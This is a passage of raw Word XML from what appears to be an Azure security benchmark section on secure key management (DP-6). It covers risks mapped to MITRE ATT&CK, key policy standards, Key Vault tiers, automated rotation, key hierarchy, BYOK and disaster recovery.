        <w:t>Document key lifecycle procedures including key rotation schedules, revocation processes for compromised keys, key retirement workflows, and disaster recovery procedures. Integrate key management into your organizational change management processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C40F35" w14:textId="23DC5D15" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00645080">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc242449508"/>
      <w:r w:rsidRPr="00645080">
        <w:t>Manage cryptographic infrastructure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="0ACCDCE6" w14:textId="44F11791" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00645080">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc242449509"/>
      <w:r w:rsidRPr="00645080">
        <w:t>DP-6: Use a secure key management process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="606752B4" w14:textId="027867B2" w:rsidR="00645080" w:rsidRDefault="00645080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD7F9E3" w14:textId="59A22708" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Implement secure key management processes that govern the complete key lifecycle: generation, distribution, storage, rotation, and revocation. Use dedicated key vault services with strong access controls, maintain cryptographic standards, enforce separation of duties, and ensure keys are rotated regularly and revoked promptly when compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3560E979" w14:textId="29ABF00E" w:rsidR="00645080" w:rsidRDefault="00645080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00645080">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F40F533" w14:textId="7E60259B" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Key sprawl &amp; orphaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B39257" w14:textId="0DA58049" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Untracked keys persist beyond business need, retaining unintended decrypt authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA33157" w14:textId="47900EA5" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Stale cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACBD009" w14:textId="339CC93A" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Infrequent rotation increases exposure to algorithmic downgrade, brute-force, or side-channel advances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F68353" w14:textId="1E5B965F" w:rsidR="00261B5A" w:rsidRPr="00261B5A" w:rsidRDefault="00261B5A" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00261B5A">
        <w:t>Privilege overreach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE52079" w14:textId="3FC3431E" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Lack of role separation lets administrators both manage and use keys, enabling insider misuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3E2C78" w14:textId="27165664" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Undetected compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C5C34C" w14:textId="760C0E9F" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>No integrity monitoring or version lineage obscures whether keys were replaced maliciously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480F39E" w14:textId="0D6CF228" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Failed revocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E5996" w14:textId="2F223F55" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Incident response cannot cryptographically contain data access after suspected breach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D3B67" w14:textId="0AD3CF48" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Inconsistent hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDEEED" w14:textId="7D3A9631" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Missing KEK/DEK layering multiplies rotation blast radius and increases operational downtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C1F0E" w14:textId="43B10D1D" w:rsidR="008B6513" w:rsidRDefault="008B6513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42C976" w14:textId="3E4BABBA" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D773AD0" w14:textId="7D3C70B8" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">credentials from password stores (T1555) extracting improperly stored or </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A2291">
        <w:t>cached</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001A2291">
        <w:t xml:space="preserve"> key material, or valid accounts (T1078) exploiting broad key management RBAC roles to access or rotate keys illegitimately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB2D513" w14:textId="05F3B22F" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF41EBA" w14:textId="2CE2916C" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>weaken encryption (T1600) retaining deprecated algorithms / insufficient key sizes to reduce cryptographic strength.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217F3DB" w14:textId="2A4CAF27" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07120DDE" w14:textId="1956C39D" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>data destruction (T1485) executing destructive purge or mishandled revocation events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E6386" w14:textId="41A71A58" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>data manipulation (T1565) replacing or altering key versions to redirect or disable encryption flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E7663" w14:textId="77777777" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="008B6513"/>
    <w:p w14:paraId="0B8DA4D6" w14:textId="423B5018" w:rsidR="008B6513" w:rsidRPr="008B6513" w:rsidRDefault="008B6513" w:rsidP="008B6513">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-6.1: Establish key management policies and infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FA236" w14:textId="7A6AA197" w:rsidR="00645080" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Build a governance foundation for cryptographic key management by establishing centralized key storage, defining cryptographic standards, and selecting appropriate protection levels based on workload sensitivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C184E" w14:textId="262E8668" w:rsidR="008B6513" w:rsidRDefault="008B6513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Establish centralized key management infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792BFCA8" w14:textId="64C7E273" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Use Azure Key Vault as the centralized cryptographic key management service to control the complete key lifecycle: generation, distribution, storage, rotation, and revocation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543019D3" w14:textId="01C1F640" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Define and enforce key policies specifying minimum cryptographic standards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545BA2D8" w14:textId="77777777" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Key type: RSA (recommended: 4096-bit or 3072-bit minimum) or EC (P-256, P-384, P-521 curves).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A832796" w14:textId="77777777" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Key operations: Limit permitted operations (encrypt, decrypt, sign, verify, wrap, unwrap) based on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>least-privilege</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A687C8" w14:textId="74928DA4" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Validity period: Set activation and expiration dates to enforce time-bound key usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ACA7A8" w14:textId="245D09BD" w:rsidR="008B6513" w:rsidRDefault="008B6513">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6513">
        <w:t>Choose appropriate key vault tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C005A20" w14:textId="77777777" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Choose the appropriate Key Vault tier based on your workload's security and compliance requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E6E78" w14:textId="77777777" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Software-protected keys (Standard &amp; Premium SKUs): FIPS 140-2 Level 1 validated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730BA59" w14:textId="77777777" w:rsidR="008B6513" w:rsidRDefault="008B6513" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>HSM-protected keys (Premium SKU): FIPS 140-2 Level 2 validated (shared multi-tenant HSM backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F657295" w14:textId="0369D07D" w:rsidR="008B6513" w:rsidRPr="00645080" w:rsidRDefault="008B6513" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Managed HSM: FIPS 140-3 Level 3 validated (dedicated single-tenant HSM pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246890E" w14:textId="06EEC686" w:rsidR="00105F1F" w:rsidRDefault="000D29FC" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="000D29FC">
        <w:lastRenderedPageBreak/>
        <w:t>For enhanced security, use Azure Key Vault Managed HSM for single-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D29FC">
        <w:t>tenant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D29FC">
        <w:t>, FIPS 140-3 Level 3 validated HSM protection. Managed HSM supports cryptographic domain for backup and disaster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D671D" w14:textId="4C43FE9F" w:rsidR="000D29FC" w:rsidRDefault="000D29FC" w:rsidP="00544DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1170"/>
      </w:pPr>
      <w:r w:rsidRPr="000D29FC">
        <w:t>Configure Azure Key Vault logging and route logs to Azure Monitor or Microsoft Sentinel to track all key access, rotation events, and administrative operations for audit and compliance purposes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D594563" w14:textId="77777777" w:rsidR="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00E14EE7"/>
    <w:p w14:paraId="055543EE" w14:textId="1F46E426" w:rsidR="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00E14EE7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-6.2: Implement key lifecycle automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D1B681" w14:textId="56EA4202" w:rsidR="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00A04309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:t>Automate key rotation and establish key hierarchies to reduce operational burden, minimize human error, and enable rapid key replacement without service disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E17914" w14:textId="60D33683" w:rsidR="00E14EE7" w:rsidRDefault="00E14EE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:t>Implement automated key rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F4A34" w14:textId="77777777" w:rsidR="00E14EE7" w:rsidRPr="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00662A0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:t>Implement automated key rotation policies in Azure Key Vault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E65EA" w14:textId="77777777" w:rsidR="00E14EE7" w:rsidRPr="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:t>Configure rotation frequency based on compliance requirements (common intervals: 90 days, 180 days, or annually).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C487E40" w14:textId="77777777" w:rsidR="00E14EE7" w:rsidRPr="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:t>Enable rotation notifications to alert operational teams before key expiration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B6CD6D" w14:textId="44203896" w:rsidR="00E14EE7" w:rsidRDefault="00E14EE7" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E14EE7">
        <w:t>Configure automatic rotation to generate new key versions without manual intervention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AD90A7" w14:textId="330A30F3" w:rsidR="005D705E" w:rsidRDefault="005D705E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t xml:space="preserve">Establish key hierarchy and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D705E">
        <w:t>BYOK</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="053A1368" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00662A0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Establish a key hierarchy separating Key Encryption Keys (KEK) and Data Encryption Keys (DEK):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20073D99" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Store KEKs in Azure Key Vault with restricted access controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2CEA1" w14:textId="77777777" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Generate service-level DEKs, encrypted by KEKs, minimizing the blast radius of key rotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34003A43" w14:textId="424DCB3B" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Rotating KEK only requires re-encrypting DEKs (not entire datasets), enabling efficient key rotation with zero downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB790B4" w14:textId="5C7164C0" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00662A0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>For Bring Your Own Key (BYOK) scenarios, generate keys in on-premises FIPS 140-2 Level 2+ HSMs and use the BYOK transfer key mechanism to securely import keys into Azure Key Vault or Managed HSM, maintaining cryptographic proof of key origin and custody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB906A" w14:textId="1D81B5F0" w:rsidR="005D705E" w:rsidRDefault="005D705E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Implement disaster recovery procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD8D252" w14:textId="46AE2910" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005D705E">
        <w:t>Create geo-replicated Key Vaults in secondary regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C85D26B" w14:textId="2CB1810C" w:rsidR="005D705E" w:rsidRDefault="005D705E" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D705E">
        <w:t>Back up</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D705E">
